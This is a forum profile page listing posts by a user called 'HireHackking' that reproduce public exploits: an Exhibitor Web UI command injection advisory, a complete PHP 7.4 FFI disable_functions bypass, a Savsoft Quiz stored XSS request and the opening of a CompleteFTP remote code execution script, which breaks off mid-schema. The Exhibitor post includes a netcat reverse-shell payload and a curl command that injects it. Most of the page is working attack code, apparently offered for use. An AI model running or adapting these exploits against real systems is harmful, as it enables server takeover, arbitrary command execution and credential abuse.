Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Exhibitor Web UI 1.7.1 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Exhibitor Web UI 1.7.1 - Remote Code Execution # Date: 2019-11-13 # Exploit Author: Logan Sanderson # Web Site: https://github.com/soabase/exhibitor/wiki/Running-Exhibitor # Version : 1.7.1 # CVE : CVE-2019-5029 Exhibitor UI command injection vulnerability November 13, 2019 CVE Number CVE-2019-5029 Summary An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process. Tested Versions Tested version was compiled using the standalone pom.xml from the Exhibitor master branch. (Note that the latest released version is labeled 1.7.1, but the version in the exhibitor-standalone’s pom.xml is set to 1.6.0.) The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added. Product URLs https://github.com/soabase/exhibitor CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE CWE-78 - Improper Neutralization of Special Elements used in an OS Command Details Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation. Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits. Exhibitor’s Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper. By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used, it may be common to find it on other ports as well. Under the Config tab in the Exhibitor Web UI, the “java.env script” field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command to launch ZooKeeper, which can be seen here. (The contents of the “java.env script” field are passed in as $JVMFLAGS.) Based on how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example: $(/bin/nc -e /bin/sh 10.0.0.64 4444 &) This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444. In the example, ZooKeeper will still launch successfully after the command executes, and it will run the command every time ZooKeeper is re-launched by Exhibitor. Exploit Proof of Concept The included screenshots show the process of obtaining a root shell on the system. The steps to exploit it from a web browser: Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON In the “java.env script” field, enter any command surrounded by $() or ``, for example, for a simple reverse shell: $(/bin/nc -e /bin/sh 10.0.0.64 4444 &) Click Commit > All At Once > OK The command may take up to a minute to execute. It can also be performed with a single curl command: command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set data.json: { “zookeeperInstallDirectory”: “/opt/zookeeper”, “zookeeperDataDirectory”: “/opt/zookeeper/snapshots”, “zookeeperLogDirectory”: “/opt/zookeeper/transactions”, “logIndexDirectory”: “/opt/zookeeper/transactions”, “autoManageInstancesSettlingPeriodMs”: “0”, “autoManageInstancesFixedEnsembleSize”: “0”, “autoManageInstancesApplyAllAtOnce”: “1”, “observerThreshold”: “0”, “serversSpec”: “1:exhibitor-demo”, “javaEnvironment”: “$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)”, “log4jProperties”: “”, “clientPort”: “2181”, “connectPort”: “2888”, “electionPort”: “3888”, “checkMs”: “30000”, “cleanupPeriodMs”: “300000”, “cleanupMaxFiles”: “20”, “backupPeriodMs”: “600000”, “backupMaxStoreMs”: “21600000”, “autoManageInstances”: “1”, “zooCfgExtra”: { “tickTime”: “2000”, “initLimit”: “10”, “syncLimit”: “5”, “quorumListenOnAllIPs”: “true” }, “backupExtra”: { “directory”: “” }, “serverId”: 1 } Mitigation Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or require authentication using something like an nginx reverse proxy and block all other access using firewall rules. If the features provided by the Exhibitor Web UI are not needed and the only needed functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service. Timeline 2019-03-08 - Vendor Disclosure 2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact 2019-05-14 - (75 day) 3rd follow up with vendor 2019-05-29 - Final notice of public disclosure release 2019-11-13 - Public Release Credit Discovered by Logan Sanderson of Cisco ASIG.
  2. HireHackking

    PHP 7.4 FFI - 'disable_functions' Bypass

    HireHackking posted a blog entry in Hacker Technology
    <?php /* FFI Exploit - uses 3 potential BUGS. PHP was contacted and said nothing in FFI is a security issue. Able to call system($cmd) without using FFI::load() or FFI::cdefs() * BUG #1 (maybe intended, but why have any size checks then?) no bounds check for FFI::String() when type is ZEND_FFI_TYPE_POINTER (https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4411) * BUG #2 (maybe intended, but why have any checks then?) no bounds check for FFI::memcpy when type is ZEND_FFI_TYPE_POINTER (https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4286) * BUG #3 Can walk back CDATA object to get a pointer to its internal reference pointer using FFI::addr() call FFI::addr on a CDATA object to get its pointer (also a CDATA object), then call FFI::addr on the resulting ptr to get a handle to it's ptr, which is the ptr_holder for the original CDATA object the easiest way is to create cdata object, write target RIP (zif_system's address) to it and finally modify it's zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it Exploit steps: 1. Use read/write to leak zif_system pointer a. walk cdata object to leak handlers pointer ( in .bss ) b. scan .bss for pointer to a known value ( *.rodata ptr), that we know usually sits right below a pointer to the .data.relro segment c. Increment and read the .data.relro pointer to get a relro section leak d. Using the relro section leak, scan up memory looking for the 'system' string that is inside the zif_system relro entry. e. once found, increment and leak the zif_system pointer 2. Hijack RIP with complete argument control a. create a function pointer CDATA object using FFI::new() [not callable as it is technically not a propper ZEND_FFI_TYPE_FUNC since it wasnt made with FFI::cdef() b. Overwrite the object'd data with zif_system pointer c. Overwrite the objects zend_ffi_type_kind with ZEND_FFI_TYPE_FUNC so that it is callable with our own arguments 3. Create proper argument object to pass to zif_system (zend_execute_data .. ) a. Build out the zend_execute_data object in a php string b. right after the object is the argument object itself (zval) which we must also build. To do so we build our PHP_STRING in another FFI buffer, leak the pointer and place it into a fake zval STRING object. c. finally we can call zif_system with a controlled argument NOTE: does NOT exit cleanly nor give command output -- both may be possible Author: Hunter Gregal Tested on: - PHP 7.4.7 x64 Ubuntu 20, ./confiure --disable-all --with-ffi - PHP 7.4.3 x64 Ubuntu 20 (apt install) */ ini_set("display_errors", "On"); error_reporting(E_ALL); function pwn($cmd) { function allocate($amt, $fill) { // could do $persistent = TRUE to alloc on libc malloc heap instead // but we already have a good read/write primitive // and relying on libc leaks for gadgets is not very portable // (custome compiled libc -> see pornhub php 0-day) $buf = FFI::new("char [".$amt."]"); $bufPtr = FFI::addr($buf); FFI::memset($bufPtr, $fill, $amt); // not sure if i need to keep the CData reference alive // or not - but just in case return it too for now return array($bufPtr, $buf); } // uses leak to leak data from FFI ptr function leak($ptr, $n, $hex) { if ( $hex == 0 ) { return FFI::string($ptr, $n); } else { return bin2hex(FFI::string($ptr, $n)); } } function ptrVal($ptr) { $tmp = FFI::cast("uint64_t", $ptr); return $tmp->cdata; } /* Read primative writes target address overtop of CDATA object pointer, then leaks directly from the CDATA object */ function Read($addr, $n = 8, $hex = 0) { // Create vulnBuf which we walk back to do the overwrite // (the size and contents dont really matter) list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8 // walk back to get ptr to ptr (heap) $vulnBufPtrPtr = FFI::addr($vulnBufPtr); /*// DEBUG $vulnBufPtrVal = ptrVal($vulnBufPtr); $vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr); printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal)); printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal)); printf("-------\n\n"); */ // Overwrite the ptr $packedAddr = pack("Q",$addr); FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8); // Leak the overwritten ptr return leak($vulnBufPtr, $n, $hex); } /* Write primative writes target address overtop of CDATA object pointer, then writes directly to the CDATA object */ function Write($addr, $what, $n) { // Create vulnBuf which we walk back to do the overwrite // (the size and contents dont really matter) list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8 // walk back to get ptr to ptr (heap) $vulnBufPtrPtr = FFI::addr($vulnBufPtr); /*// DEBUG $vulnBufPtrVal = ptrVal($vulnBufPtr); $vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr); printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal)); printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal)); printf("-------\n\n"); */ // Overwrite the ptr $packedAddr = pack("Q",$addr); FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8); // Write to the overwritten ptr FFI::memcpy($vulnBufPtr, $what, $n); } function isPtr($knownPtr, $testPtr) { if ( ($knownPtr & 0xFFFFFFFF00000000) == ($testPtr & 0xFFFFFFFF00000000)) { return 1; } else { return 0; } } /* Walks looking for valid pointers * - each valid ptr is read and if it - points to the target return the address of the - ptr and the location it was found */ //function getRodataAddr($bssLeak) { function walkSearch($segmentLeak, $maxQWORDS, $target, $size = 8, $up = 0) { $start = $segmentLeak; for($i = 0; $i < $maxQWORDS; $i++) { if ( $up == 0 ) { // walk 'down' addresses $addr = $start - (8 * $i); } else { // walk 'up' addresses $addr = $start + (8 * $i); } //$leak = Read($addr, 8); $leak = unpack("Q", Read($addr))[1]; // skip if its not a valid pointer... if ( isPtr($segmentLeak, $leak) == 0 ) { continue; } $leak2 = Read($leak, $n = $size); //printf("0x%x->0x%x = %s\n", $addr, $leak, $leak2); if( strcmp($leak2, $target) == 0 ) { # match return array ($leak, $addr); } } return array(0, 0); } function getBinaryBase($textLeak) { $start = $textLeak & 0xfffffffffffff000; for($i = 0; $i < 0x10000; $i++) { $addr = $start - 0x1000 * $i; $leak = Read($addr, 7); //if($leak == 0x10102464c457f) { # ELF header if( strcmp($leak, "\x7f\x45\x4c\x46\x02\x01\x01") == 0 ) { # ELF header return $addr; } } return 0; } function parseElf($base) { $e_type = unpack("S", Read($base + 0x10, 2))[1]; $e_phoff = unpack("Q", Read($base + 0x20))[1]; $e_phentsize = unpack("S", Read($base + 0x36, 2))[1]; $e_phnum = unpack("S", Read($base + 0x38, 2))[1]; for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = unpack("L", Read($header, 4))[1]; $p_flags = unpack("L", Read($header + 4, 4))[1]; $p_vaddr = unpack("Q", Read($header + 0x10))[1]; $p_memsz = unpack("Q", Read($header + 0x28))[1]; if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function getBasicFuncs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = unpack("Q", Read($data_addr+ ($i * 8)))[1]; if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = unpack("Q", Read($leak))[1]; # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = unpack("Q", Read($data_addr + (($i + 4) * 8)))[1]; if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = unpack("Q", Read($leak))[1]; # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function getSystem($basic_funcs) { $addr = $basic_funcs; do { $f_entry = unpack("Q", Read($addr))[1]; $f_name = Read($f_entry, 6) . "\0"; if( strcmp($f_name, "system\0") == 0) { # system return unpack("Q", Read($addr + 8))[1]; } $addr += 0x20; } while($f_entry != 0); return false; } // Convenient for debugging function crash() { Write(0x0, "AAAA", 4); } printf("\n[+] Starting exploit...\n"); // --------------------------- start of leak zif_system address /* NOTE: typically we would leak a .text address and walk backwards to find the ELF header. From there we can parse the elf information to resolve zif_system - in our case the base PHP binary image with the ELF head is on its own mapping that does not border the .text segment. So we need a creative way to get zif_system */ /* ---- First, we use our read to walk back to the our Zend_object, // and get its zend_object_handlers* which will point to the // php binary symbols zend_ffi_cdata_handlers in the .bss. // //_zend_ffi_cdata.ptr-holder - _zend_ffi_cdata.ptr.std.handlers == 6 QWORDS // // From there we search for a ptr to a known value (happens to be to the .rodata section) // that just so happens to sit right below a ptr to the 'zend_version' relro entry. // So we do some checks on that to confirm it is infact a valid ptr to the .data.relro. // // Finally we walk UP the relro entries looking for the 'system' (zif_system) entry. (zend_types.h) struct _zend_object { <-----typdef zend_object zend_refcounted_h gc; uint32_t handle; // may be removed ??? end_class_entry *ce; const zend_object_handlers *handlers; <--- func ptrs HashTable *properties; zval properties_table[1]; }; (ffi.c) typedef struct _zend_ffi_cdata { zend_object std; zend_ffi_type *type; void *ptr; <--- OVERWRITE void *ptr_holder; <-- zend_ffi_flags flags; } zend_ffi_cdata; */ list($dummyPtr, $dummy) = allocate(64, 0x41); // dummy buf ptr $dummyPtrVal = ptrVal($dummyPtr); // dummy buf ptr ptr $dummyPtrPtr = FFI::addr($dummyPtr); $dummyPtrPtrVal = ptrVal($dummyPtrPtr); printf("Dummy BufPtr = 0x%x\n", $dummyPtrVal); printf("Dummy BufPtrPtr = 0x%x\n", $dummyPtrPtrVal); $r = leak($dummyPtr, 64, 1); printf("Dummy buf:\n%s\n", $r); printf("-------\n\n"); /* // ------ Test our read and write $r = Read($dummyPtrVal, 256, 1); printf("Read Test (DummyBuf):\n%s\n", $r); Write($dummyPtrVal, "CCCCCCCC", 8); $r = Read($dummyPtrVal, 256, 1); printf("Write Test (DummyBuf):\n%s\n", $r); // ---------- */ $handlersPtrPtr = $dummyPtrPtrVal - (6 * 8); printf("_zend_ffi_cdata.ptr.std.handlers = 0x%x\n", $handlersPtrPtr); $handlersPtr = unpack("Q", Read($handlersPtrPtr))[1]; // --> zend_ffi_cdata_handlers -> .bss printf("zend_ffi_cdata_handlers = 0x%x\n", $handlersPtr); // Find our 'known' value in the .rodata section -- in this case 'CORE' // (backup can be 'STDIO)' list($rodataLeak, $rodataLeakPtr) = walkSearch($handlersPtr, 0x400,"Core", $size=4); if ( $rodataLeak == 0 ) { // If we failed let's just try to find PHP's base and hope for the best printf("Get rodata addr failed...trying for last ditch effort at PHP's ELF base\n"); // use .txt leak $textLeak = unpack("Q", Read($handlersPtr+16))[1]; // zned_objects_destroy_object printf(".textLeak = 0x%x\n", $textLeak); $base = getBinaryBase($textLeak); if ( $base == 0 ) { die("Failed to get binary base\n"); } printf("BinaryBase = 0x%x\n", $base); // parse elf if (!($elf = parseElf($base))) { die("failed to parseElf\n"); } if (!($basicFuncs = getBasicFuncs($base, $elf))) { die("failed to get basic funcs\n"); } if (!($zif_system = getSystem($basicFuncs))) { die("Failed to get system\n"); } // XXX HERE XXX //die("Get rodata addr failed\n"); } else { printf(".rodata leak ('CORE' ptr) = 0x%x->0x%x\n", $rodataLeakPtr, $rodataLeak); // Right after the "Core" ptrptr is zend_version's relro entry - XXX this may not be static // zend_version is in .data.rel.ro $dataRelroPtr = $rodataLeakPtr + 8; printf("PtrPtr to 'zend_verson' relro entry: 0x%x\n", $dataRelroPtr); // Read the .data.relro potr $dataRelroLeak = unpack("Q", Read($dataRelroPtr))[1]; if ( isPtr($dataRelroPtr, $dataRelroLeak) == 0 ) { die("bad zend_version entry pointer\n"); } printf("Ptr to 'zend_verson' relro entry: 0x%x\n", $dataRelroLeak); // Confirm this is a ptrptr to zend_version $r = unpack("Q", Read($dataRelroLeak))[1]; if ( isPtr($dataRelroLeak, $r) == 0 ) { die("bad zend_version entry pointer\n"); } printf("'zend_version' string ptr = 0x%x\n", $r); $r = Read($r, $n = 12); if ( strcmp($r, "zend_version") ) { die("Failed to find zend_version\n"); } printf("[+] Verified data.rel.ro leak @ 0x%x!\n", $dataRelroLeak); /* Walk FORWARD the .data.rel.ro segment looking for the zif_system entry - this is a LARGE section... */ list($systemStrPtr, $systemEntryPtr) = walkSearch($dataRelroLeak, 0x3000, "system", $size = 6, $up =1); if ( $systemEntryPtr == 0 ) { die("Failed to find zif_system relro entry\n"); } printf("system relro entry = 0x%x\n", $systemEntryPtr); $zif_systemPtr = $systemEntryPtr + 8; $r = unpack("Q", Read($zif_systemPtr))[1]; if ( isPtr($zif_systemPtr, $r) == 0 ) { die("bad zif_system pointer\n"); } $zif_system = $r; } printf("[+] zif_system @ 0x%x\n", $zif_system); // --------------------------- end of leak zif_system address // --------------------------- start call zif_system /* To call system in a controlled manner the easiest way is to create cdata object, write target RIP (zif_system's address) to it and finally modify it's zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it */ $helper = FFI::new("char* (*)(const char *)"); //$helper = FFI::new("char* (*)(const char *, int )"); // XXX if we want return_val control $helperPtr = FFI::addr($helper); //list($helperPtr, $helper) = allocate(8, 0x43); //$x[0] = $zif_system; $helperPtrVal = ptrVal($helperPtr); $helperPtrPtr = FFI::addr($helperPtr); $helperPtrPtrVal = ptrVal($helperPtrPtr); printf("helper.ptr_holder @ 0x%x -> 0x%x\n", $helperPtrPtrVal, $helperPtrVal); // Walk the type pointers //$helperObjPtr = $helperPtrPtrVal - (9 *8); // to top of cdata object //printf("helper CDATA object @ 0x%x\n", $helperObjPtr); $helperTypePtrPtr = $helperPtrPtrVal - (2 *8); // 2 DWORDS up the struct to *type ptr //printf("helper CDATA type PtrPtr @ 0x%x\n", $helperTypePtrPtr); $r = unpack("Q", Read($helperTypePtrPtr))[1]; if ( isPtr($helperTypePtrPtr, $r) == 0 ) { die("bad helper type pointer\n"); } $helperTypePtr = $r; // Confirm it's currently ZEND_FFI_TYPE_VOID (0) $r = Read($helperTypePtr, $n=1, $hex=1); if ( strcmp($r, "00") ) { die("Unexpected helper type!\n"); } printf("Current helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_VOID (0)\n", $helperTypePtrPtr, $helperTypePtr); // Set it to ZEND_FFI_TYPE_FUNC (16 w/ HAVE_LONG_DOUBLE else 15) Write($helperTypePtr, "\x10", 1); printf("Swapped helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_FUNC (16)\n", $helperTypePtrPtr, $helperTypePtr); // Finally write zif_system to the value Write($helperPtrVal, pack("Q", $zif_system), 8); // --------------------------- end of leak zif_system address // ----------------------- start of build zif_system argument /* zif_system takes 2 args -> zif_system(*zend_execute_data, return_val) For now I don't bother with the return_val, although tehnically we could control it and potentially exit cleanly */ // ----------- start of setup zend_execute_data object /* Build valid zend_execute object struct _zend_execute_data { const zend_op *opline; /* executed opline zend_execute_data *call; /* current call zval *return_value; zend_function *func; /* executed function zval This; /* this + call_info + num_args zend_execute_data *prev_execute_data; zend_array *symbol_table; void **run_time_cache; /* cache op_array->run_time_cache }; //0x48 bytes */ //This.u2.num_args MUST == our number of args (1 or 2 apparantly..) [6 QWORD in execute_data] $execute_data = str_shuffle(str_repeat("C", 5*8)); // 0x28 C's $execute_data .= pack("L", 0); // this.u1.type $execute_data .= pack("L", 1); // this.u2.num_args $execute_data .= str_shuffle(str_repeat("A", 0x18)); // fill out rest of zend_execute obj $execute_data .= str_shuffle(str_repeat("D", 8)); //padding // ----------- end of setup zend_execute_data object // ----------- start of setup argument object /* the ARG (zval) object lays after the execute_data object zval { value = *cmdStr ([16 bytes] + [QWORD string size] + [NULL terminated string]) u1.type = 6 (IS_STRING) u2.???? = [unused] } */ /* // Let's get our target command setup in a controlled buffer // TODO - use the dummy buf? // the string itself is odd. it has 16 bytes prepended to it that idk what it is // the whole argument after the zend_execute_data object looks like */ $cmd_ = str_repeat("X", 16); // unk padding $cmd_ .= pack("Q", strlen($cmd)); // string len $cmd_ .= $cmd . "\0"; // ensure null terminated! list($cmdBufPtr, $cmdBuf) = allocate(strlen($cmd_), 0); $cmdBufPtrVal = ptrVal($cmdBufPtr); FFI::memcpy($cmdBufPtr, $cmd_, strlen($cmd_)); printf("cmdBuf Ptr = 0x%x\n", $cmdBufPtrVal); // Now setup the zval object itself $zval = pack("Q", $cmdBufPtrVal); // zval.value (pointer to cmd string) $zval .= pack("L", 6); // zval.u1.type (IS_STRING [6]) $zval .= pack("L", 0); // zval.u2 - unused $execute_data .= $zval; // ---------- end of setup argument object // ----------------------- start of build zif_system argument $res = $helper($execute_data); //$return_val = 0x0; // // XXX if we want return_val control //$res = $helper($execute_data, $return_val); // XXX if we want return_val control // --------------------------- end of call zif_system } pwn("touch /tmp/WIN2.txt"); ?>
  3. HireHackking

    Savsoft Quiz 5 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Savsoft Quiz 5 - Persistent Cross-Site Scripting # Date: 2020-07-09 # Exploit Author: Ogulcan Unveren(th3d1gger) # Vendor Homepage: https://savsoftquiz.com/ # Software Link: https://github.com/savsofts/savsoftquiz_v5.git # Version: 5.0 # Tested on: Kali Linux ---Vulnerable Source Code---- function insert_user_2(){ $userdata=array( 'email'=>$this->input->post('email'), 'password'=>md5($this->input->post('password')), 'first_name'=>$this->input->post('first_name'), 'last_name'=>$this->input->post('last_name'), 'contact_no'=>$this->input->post('contact_no'), 'gid'=>implode(',',$this->input->post('gid')), 'su'=>'2' ); $veri_code=rand('1111','9999'); if($this->config->item('verify_email')){ $userdata['verify_code']=$veri_code; } if($this->session->userdata('logged_in_raw')){ $userraw=$this->session->userdata('logged_in_raw'); $userraw_uid=$userraw['uid']; $this->db->where('uid',$userraw_uid); $rresult=$this->db->update('savsoft_users',$userdata); if($this->session->userdata('logged_in_raw')){ $this->session->unset_userdata('logged_in_raw'); } }else{ $rresult=$this->db->insert('savsoft_users',$userdata); $uid=$this->db->insert_id(); foreach($_POST['custom'] as $ck => $cv){ if($cv != ''){ $savsoft_users_custom=array( 'field_id'=>$ck, 'uid'=>$uid, 'field_values'=>$cv ); $this->db->insert('savsoft_users_custom',$savsoft_users_custom); } } ----Vulnerable Request--- POST /index.php/login/insert_user/ HTTP/1.1 Host: savsoftquiz_v5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2/index.php/login/registration/ Content-Type: application/x-www-form-urlencoded Content-Length: 231 Connection: close Cookie: ci_session=0lhlr1iv1qgru1u1kmg42lbvj8mprokv Upgrade-Insecure-Requests: 1 email=hello%40gmail.com&password=password&first_name=XSSPAYLOAD&last_name=test&contact_no=05785555555&gid%5B%5D=1
  4. HireHackking

    CompleteFTP Professional 12.1.3 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CompleteFTP Professional < 12.1.3 - Remote Code Execution # Date: 2020-03-11 # Exploit Author: 1F98D # Original Author: Rhino Security Labs # Vendor Homepage: https://enterprisedt.com/products/completeftp/ # Version: CompleteFTP Professional # Tested on: Windows 10 (x64) # CVE: CVE‑2019‑16116 # References: # https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/ # https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-16116 # # CompleteFTP before 12.1.3 logs an obscured administrator password to a file # during installation (C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log) # if CompleteFTP is configured to permit remote administration (over port 14983) it # is possible to obtain remote code execution through the administration interface # # This script requires the following python modules are installed # pip install paramiko pycryptodome uuid # #!/usr/local/bin/python3 from paramiko.sftp import CMD_EXTENDED from base64 import b64encode, b64decode from Crypto.Util.Padding import unpad from Crypto.Cipher import DES3 import xml.etree.ElementTree as ET import paramiko import struct import uuid import sys # region get_server_info get_server_info = """ <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <i2:GetServerInfo id="ref-1" xmlns:i2="Admin API"> </i2:GetServerInfo> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """.strip() # endregion # region update_config update_config = """ <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <i2:UpdateConfig id="ref-1" xmlns:i2="Admin API"> <changes href="#ref-4"/> </i2:UpdateConfig> <a1:ConfigDataSet id="ref-4" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/EnterpriseDT.Net.FtpServer.Config/CompleteFTPManager%2C%20Version%3D8.3.3.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D48e55b33069804ce"> <DataSet.RemotingVersion href="#ref-5"/> <XmlSchema id="ref-6">{XMLSCHEMA}</XmlSchema> <XmlDiffGram id="ref-7">{XMLDIFFGRAM}</XmlDiffGram> </a1:ConfigDataSet> <a2:Version id="ref-5" xmlns:a2="http://schemas.microsoft.com/clr/ns/System"> <_Major>2</_Major> <_Minor>0</_Minor> <_Build>-1</_Build> <_Revision>-1</_Revision> </a2:Version> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """.strip() # endregion # region xml_schema xml_schema = """ <?xml version="1.0" encoding="utf-16"?> <xs:schema id="ConfigDataSet" targetNamespace="http://tempuri.org/ConfigDataSet.xsd" xmlns:mstns="http://tempuri.org/ConfigDataSet.xsd" xmlns="http://tempuri.org/ConfigDataSet.xsd" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:msprop="urn:schemas-microsoft-com:xml-msprop" attributeFormDefault="qualified" elementFormDefault="qualified"> <xs:element name="ConfigDataSet" msdata:IsDataSet="true" msdata:Locale="en-US" msdata:TimestampingEnabled="False"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="PlugIn"> <xs:complexType> <xs:sequence> <xs:element name="PlugInID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" /> <xs:element name="Name" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd"> <xs:simpleType> <xs:restriction base="xs:string"> <xs:maxLength value="100" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="ClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd"> <xs:simpleType> <xs:restriction base="xs:string"> <xs:maxLength value="400" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="PlugInTypeID" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" /> <xs:element name="Configuration" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" /> <xs:element name="CreatedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" /> <xs:element name="ModifiedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" /> <xs:element name="UserInstance" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" /> <xs:element name="System" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" /> <xs:element name="EditorClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0"> <xs:simpleType> <xs:restriction base="xs:string"> <xs:maxLength value="100" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="AssemblyPath" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0"> </xs:element> <xs:element name="MinimumEdition" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" /> <xs:element name="ChangeSetID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" /> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="Server"> <xs:complexType> </xs:complexType> </xs:element> <xs:element name="SiteUser"> <xs:complexType> </xs:complexType> </xs:element> <xs:element name="Site"> <xs:complexType> </xs:complexType> </xs:element> <xs:element name="Node"> <xs:complexType> </xs:complexType> </xs:element> <xs:element name="TrashHeap1"> <xs:complexType> </xs:complexType> </xs:element> <xs:element name="TrashHeap2"> <xs:complexType> </xs:complexType> </xs:element> <xs:element name="ChangeSet"> <xs:complexType> </xs:complexType> </xs:element> <xs:element name="RuntimeVariable"> <xs:complexType> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> <xs:unique name="PlugIn_Constraint1" msdata:ConstraintName="Constraint1" msdata:PrimaryKey="true"> <xs:selector 